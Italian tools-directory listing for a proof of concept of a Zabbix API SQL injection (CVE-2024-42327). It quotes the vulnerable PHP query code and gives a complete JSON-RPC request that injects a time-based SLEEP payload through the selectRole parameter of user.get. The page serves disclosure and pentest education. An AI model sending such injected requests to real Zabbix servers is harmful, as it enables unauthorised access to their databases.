Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-42327 — PoC per CVE-2024-42327 / ZBX-25623 | Kitploit
Strumenti/GitHubGitHub/compr00t/cve-2024-42327
Analisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubcompr00t/cve-2024-42327

CVE-2024-42327

PoC per CVE-2024-42327 / ZBX-25623

Vedi Repository
1851 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

PoC per CVE-2024-42327 / ZBX-25623

Un account utente non amministratore sul frontend di Zabbix con il ruolo Utente predefinito, o con qualsiasi altro ruolo che fornisce accesso API, può sfruttare questa vulnerabilità. Esiste una SQLi nella classe CUser nella funzione addRelatedObjects; questa funzione viene chiamata dalla funzione CUser.get, disponibile per ogni utente che ha accesso API.

Disclaimer

Questo script è fornito solo a scopo educativo!

Prova di concetto

Il seguente codice della versione 6.0.31 è vulnerabile a SQLi:

root@kitploit:~
$db_roles = DBselect(
	'SELECT u.userid'.($options['selectRole'] ? ',r.'.implode(',r.', $options['selectRole']) : '').
	' FROM users u,role r'.
	' WHERE u.roleid=r.roleid'.
	' AND '.dbConditionInt('u.userid', $userIds)
);

La seguente chiamata innesca la vulnerabilità:

root@kitploit:~
POST /api_jsonrpc.php HTTP/1.1
Host: localhost
User-Agent: curl/8.11.0
Accept: */*
Content-Type: application/json
Content-Length: 222
Connection: keep-alive

{
  "jsonrpc": "2.0",
  "method": "user.get",
  "params": {
    "selectRole": ["roleid", "name", "type", "readonly AND (SELECT(SLEEP(5)))"],
    "userids": ["1","2"]
  },
  "id": 1,
  "auth": ""
}

Riferimenti

  • https://support.zabbix.com/browse/ZBX-25623
  • https://nvd.nist.gov/vuln/detail/CVE-2024-42327
Scarica lo strumento